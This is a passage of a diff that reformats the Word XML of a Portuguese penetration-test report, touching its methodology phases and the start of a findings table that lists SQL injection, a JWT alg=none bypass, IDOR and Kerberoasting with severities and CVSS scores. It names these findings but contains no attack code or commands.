@@ -1592,12 +1745,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Bypass de autenticação, extração inferencial de dados e XSS armazenado.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Bypass de autenticação, extração inferencial de dados e XSS armazenado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1607,7 +1760,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">6. Pós-exploração</w:t>
+        <w:t>6. Pós-exploração</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1625,7 +1778,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Movimentação lateral e abuso de Kerberos no domínio de teste.</w:t>
+        <w:t>Movimentação lateral e abuso de Kerberos no domínio de teste.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1643,12 +1796,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Demonstração de impacto encadeado, sem ações destrutivas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Demonstração de impacto encadeado, sem ações destrutivas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1658,7 +1811,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">7. Relatório</w:t>
+        <w:t>7. Relatório</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1676,7 +1829,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Consolidação de evidências, classificação de risco e recomendações.</w:t>
+        <w:t>Consolidação de evidências, classificação de risco e recomendações.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1694,12 +1847,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Roteiro de remediação priorizado e reteste sugerido.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="220"/>
+        <w:t>Roteiro de remediação priorizado e reteste sugerido.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="220"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1709,13 +1862,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEÇÃO 5</w:t>
+        <w:t>SEÇÃO 5</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
+          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
         </w:pBdr>
         <w:spacing w:after="60"/>
       </w:pPr>
@@ -1727,41 +1880,52 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">Achados Detalhados</w:t>
+        <w:t>Achados Detalhados</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:type="pct" w:w="100%"/>
+        <w:tblW w:w="5000" w:type="pct"/>
         <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="E2E8F0" w:sz="4"/>
-          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
+          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
         </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
+        <w:gridCol w:w="780"/>
+        <w:gridCol w:w="5458"/>
+        <w:gridCol w:w="1364"/>
+        <w:gridCol w:w="780"/>
+        <w:gridCol w:w="1364"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:trPr>
           <w:tblHeader/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="pct" w:w="8%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+            <w:tcW w:w="400" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1773,19 +1937,20 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">ID</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="56%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:lastRenderedPageBreak/>
+              <w:t>ID</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2800" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1797,19 +1962,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Achado</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="14%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Achado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="700" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1821,19 +1986,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Severidade</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="8%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Severidade</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="400" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1845,19 +2010,19 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">CVSS</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="14%"/>
-            <w:shd w:fill="194FE3" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="50"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="50"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>CVSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="700" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="194FE3"/>
+            <w:tcMar>
+              <w:top w:w="50" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="50" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1869,19 +2034,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Categoria</w:t>
+              <w:t>Categoria</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1891,17 +2063,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-02</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-02</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1911,17 +2084,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">SQL Injection (boolean/time-based) em /buscar</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>SQL Injection (boolean/time-based) em /buscar</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1933,17 +2107,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Crítico</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Crítico</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1953,17 +2128,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">9.4</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>9.4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1973,19 +2149,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Aplicação Web</w:t>
+              <w:t>Aplicação Web</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -1995,17 +2178,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-01</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-01</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2015,17 +2199,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Bypass de autenticação via JWT com alg=none</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Bypass de autenticação via JWT com alg=none</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2037,17 +2222,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Crítico</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Crítico</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2057,17 +2243,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">9.1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>9.1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2077,19 +2264,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Aplicação Web</w:t>
+              <w:t>Aplicação Web</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2099,17 +2293,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-03</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-03</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2119,17 +2314,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">IDOR/BOLA em /api/v1/orders/{id}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>IDOR/BOLA em /api/v1/orders/{id}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2141,17 +2337,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Alto</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Alto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2161,17 +2358,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">8.1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>8.1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2181,19 +2379,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">API</w:t>
+              <w:t>API</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2203,17 +2408,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">F-04</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>F-04</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2223,17 +2429,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Kerberoasting de conta de serviço (svc_sql)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Kerberoasting de conta de serviço (svc_sql)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2245,17 +2452,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Alto</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Alto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2265,17 +2473,18 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">8.0</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>8.0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -2285,19 +2494,26 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve">Active Directory</w:t>
